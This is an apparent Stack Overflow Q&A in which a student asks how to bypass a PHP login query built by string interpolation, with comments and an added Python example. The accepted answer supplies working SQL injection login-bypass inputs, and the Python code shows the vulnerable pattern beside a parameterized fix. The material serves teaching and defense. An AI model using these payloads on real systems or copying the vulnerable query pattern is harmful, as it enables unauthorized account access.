I received an assignment to hack a given website using SQL injection

$sel1 = mysql_query("SELECT ID, name, locale, lastlogin, gender
                     FROM USERS_TABLE
                     WHERE (name = '$user' OR email = '$user') AND pass = '$pass'");

$chk = mysql_fetch_array($sel1);

if ($chk) {
    // found one record: allow the user to login
}

The question is which values of $user and $password should I enter to hack the website?

I've tried putting a true value in user (e.g. admin) and for the $password I tried using (" or ""=") - no brackets - which didn't work. I also tried (' or ''=') - no brackets.

This looks quite simple, am I missing something?

Terry
user779444

1 Answer

I assume this is a school/university assignment, and not for purpose of hacking real sites.

Paste something which would be a part of the valid SQL, and which would make the condition evaluate to TRUE regardless of what's actually in the database.

That means, by entering the "correct" values, you can login to the web site without knowing the actual username/password in the database.

Consider the following condition:

WHERE (name = '' OR ''='' OR email = '' OR ''='') AND pass = '' OR TRUE LIMIT 1 -- '

It always evaluates to TRUE if there's at least one user in the database, and it returns one row at most (because of LIMIT 1).

Now you must just "extract the pieces from this condition" and enter them as user name and password:

  • User name: ' OR ''='
  • Password: ' OR TRUE LIMIT 1 --

Note that the last apostrophe character at the end of the query, which is inserted by PHP, becomes part of a comment and does not cause an SQL syntax error.

Quentin
Alex Shesterov
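To show why the interpolated query in the question is the problem and what closes it, here is an added example (not code from the question or the answer): the same login check in Python against an in-memory SQLite stand-in for USERS_TABLE, first built by string interpolation as in the PHP, then with bound parameters. The sample row, the email column and the password value are constructed assumptions.

```python
import sqlite3


def make_db():
    # Constructed in-memory stand-in for USERS_TABLE (sample data, not from the page).
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE USERS_TABLE (ID INTEGER, name TEXT, locale TEXT, "
               "lastlogin TEXT, gender TEXT, email TEXT, pass TEXT)")
    db.execute("INSERT INTO USERS_TABLE VALUES (1, 'admin', 'en', '2016-03-25', "
               "'m', 'admin@example.invalid', 'correct-horse')")
    return db


def login_vulnerable(db, user, pw):
    # Mirrors the question's PHP: the inputs are pasted straight into the SQL
    # text, so quote characters in them change the shape of the statement.
    sql = ("SELECT ID, name, locale, lastlogin, gender FROM USERS_TABLE "
           f"WHERE (name = '{user}' OR email = '{user}') AND pass = '{pw}'")
    return db.execute(sql).fetchone() is not None


def login_safe(db, user, pw):
    # Placeholders: the driver sends the values separately from the SQL text,
    # so quotes, OR, LIMIT and comment markers in the input are data only.
    sql = ("SELECT ID, name, locale, lastlogin, gender FROM USERS_TABLE "
           "WHERE (name = ? OR email = ?) AND pass = ?")
    return db.execute(sql, (user, user, pw)).fetchone() is not None


if __name__ == "__main__":
    db = make_db()
    payload_user, payload_pw = "' OR ''='", "' OR TRUE LIMIT 1 --"
    print("interpolated, answer's inputs:", login_vulnerable(db, payload_user, payload_pw))
    print("parameterized, same inputs:  ", login_safe(db, payload_user, payload_pw))
```

The interpolated version accepts the answer's inputs without a valid password; the parameterized version treats them as an ordinary (non-matching) username and password.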
  • The police in this site isn't kidding around huh? If only we had this cyber army in most video games, maybe the community will be better – user779444 Mar 25 '16 at 23:04
  • @user779444, I believe there was a lot of misunderstanding on your question. Some people thought you were after breaking some real site rather than learning. Such things can happen anywhere occasionally, please don't take it too close. And do not lose faith in StackOverflow, it's a great resource actually. The moderator now just locked the question so everybody gets cool and removed all the useless comments :) – Alex Shesterov Mar 25 '16 at 23:08
  • @user779444, also, if you're keen to learn about web sites security, please try this game: http://xss-game.appspot.com/ It's about XSS, not SQL injections, but quite fun nevertheless (you'll be hacking multiple pages on this site :) ). – Alex Shesterov Mar 25 '16 at 23:10
  • Cool website, thanks. I'd like to believe most people, at least those with high rep, are like you: caring, helpful and believing in StackOverflow and its users. Well done! – user779444 Mar 25 '16 at 23:15